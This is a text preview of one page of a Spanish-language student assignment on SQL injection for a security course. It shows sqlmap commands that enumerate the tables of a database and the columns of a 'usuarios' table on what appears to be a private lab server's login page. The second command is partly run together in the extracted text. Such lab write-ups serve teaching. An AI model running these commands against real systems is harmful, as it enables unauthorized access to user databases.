Vista previa del documento SEGURIDAD Y ALTA DISPONIBILIDAD por alumno - sql injection_Fernando_Zapata.pdf - Página 3/5 - Caja PDF

sql injection Fernando Zapata.pdf

Vista previa del archivo PDF sql-injection-fernando-zapata.pdf

Página 1 2 3 4 5

Vista previa de texto

- SEGURIDAD Y ALTA DISPONIBILIDAD
Para sacar las tablas se selecciona la database con –D nombre_BBDD

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -D db2asir03 --tables

Se ve el resultado que contiene una table.

Se acceden a las columnas de la table usuarios

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user=--T
usuarios --columns

3